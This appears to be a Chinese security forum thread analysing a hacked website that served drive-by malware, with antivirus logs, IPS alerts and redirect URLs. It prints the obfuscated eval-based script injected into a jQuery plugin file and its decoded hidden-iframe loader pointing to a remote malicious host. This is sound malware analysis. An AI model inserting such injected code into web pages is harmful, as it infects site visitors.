http://www.intoiltech.com/?catid=37&menuid=&itemid=34

墨家小子

2013/4/24        16:35:08        已清除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\29AWDAJK\PieNG[1].js        JS/IFrame.gen.j (特洛伊)
2013/4/24        16:35:09        已清除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5AZN4WY\jquery[1].js        JS/IFrame.gen.j (特洛伊)
2013/4/24        16:35:09        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5AZN4WY\jquery.lightbox.min[1].js        JS/Exploit-Blacole.eu (特洛伊)
2013/4/24        16:35:09        已清除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5AZN4WY\AC_RunActiveContent[1].js        JS/IFrame.gen.j (特洛伊)
2013/4/24        16:35:09        已清除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A9URQ42P\SpryMenuBar[1].js        JS/IFrame.gen.j (特洛伊)
2013/4/24        16:35:09        已清除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\P18EO2V5\intoiltech_com[1].htm        JS/IFrame.gen.j (特洛伊)

wjhstu-VxG

1. <frame src="http://cloud1.mimosofacial.com/showthread.php?sid=209833&amp;framerequest=1&amp;refurl=" name="landingparent">

复制代码

奇怪了，这边做多只能看到跳转到这个框架，这个框架没问题，但是NIS也拦截到其他网页……

类别： 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明

2013/4/24 18:52:08,高,阻止了 www.intoiltech.com的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website,不需要操作,不需要操作,"www.intoiltech.com (118.69.204.202, 80)",www.intoiltech.com/templates/jqu ... ery.lightbox.min.js",118.69.204.202 (118.69.204.202),"TCP, www-http"
来自 <b>www.intoiltech.com/templates/jquery-lightbox/js/jquery.lightbox.min.js</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\WINDOWS\SYSWOW64\VMNAT.EXE 引起。  要停止接收有关此类通信的通知，请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。

蓝核

wjhstu-VxG 发表于 2013-4-24 19:03
奇怪了，这边做多只能看到跳转到这个框架，这个框架没问题，但是NIS也拦截到其他网页……

类别： 入侵防 ...

<html><head><script type="text/javascript" src="http://211.138.207.229:57628/admode.js"></script><script type="text/javascript">var param="http://211.138.207.229:57628/a/s?f=adstyle_th.html&adid=200122&tcca=MTg3NjEwMTg2Mjg=&urip=1880402345&orlu=aHR0cDovL3d3dy5pbnRvaWx0ZWNoLmNvbS8/Y2F0aWQ9MzcmYW1wO21lbnVpZD0mYW1wO2l0ZW1pZD0zNA==&spid=1800581940&area=85&ts=1366807476&aorlu=aHR0cDovL2hhby5qcy5jaGluYW1vYmlsZS5jb20v&p1arm=0&p2arm=0&p3arm=0&p4arm=5&p5arm=3&p6arm=1&appd=0&hasCount=1&hasWhiteUser=1";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(param)"></body></html>

dayangyang

http://www.intoiltech.com/templa ... ery.lightbox.min.js
最后被插入了恶意代码：

1. /*c3284d*/
   
2. try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,88,99,94,95,91,86,107,106,94,90,97,90,107,105,35,90,101,98,38,94,105,107,102,35,103,94,101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;291-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s);
   
3. /*/c3284d*/

复制代码

现在挂马的喜欢自己留标记么。。/*/c3284d*/就是个标记，其他不同类型的恶意代码里也有这个
另外这个代码。。和前天解得好相似，估计是挂马器？

1. function frmAdd() {var ifrm = document.createElement('iframe');ifrm.style.position='absolute';ifrm.style.top='-999em';ifrm.style.left='-999em';ifrm.src  = "http://miamiheattickets.com/http.php";ifrm.id = 'frmId';document.body.appendChild(ifrm);};window.onload = frmAdd;

复制代码

墨家小子

dayangyang 发表于 2013-4-24 22:28
http://www.intoiltech.com/templates/jquery-lightbox/js/jquery.lightbox.min.js
最后被插入了恶意代码： ...

http://www.intoiltech.com/templates/jquery-lightbox/js/jquery.lightbox.min.js

dayangyang

蓝核 发表于 2013-4-24 20:46
var param="http://211.138.207.229:57628/a/s?f=adstyle_th.html&adid=200122&tcca=MTg3NjEwMTg2Mjg=&ur ...

PMW好处是能看到最后的结果。。不过看不出挂马链。。。另外这里面没有解完啊。。还有就是这个是从哪里来的？我没找到

蓝核

dayangyang 发表于 2013-4-24 22:30
PMW好处是能看到最后的结果。。不过看不出挂马链。。。

所以我不少是直接看他的病毒日志来直接打开的……这个毒网我再解解看

wjhstu-VxG

dayangyang 发表于 2013-4-24 22:28
http://www.intoiltech.com/templates/jquery-lightbox/js/jquery.lightbox.min.js
最后被插入了恶意代码： ...

估计是生成地址的时候，给的识别代码……省的自己生成的马，都分不清了……

dayangyang

http://211.138.207.229:57628/a/s ... =1&hasWhiteUser
其实就是 http://www.intoiltech.com/?catid ... =&amp;itemid=34
最后跳转到mimosofacial.com/showthread.php?sid=209833
这个网页有点小复杂。。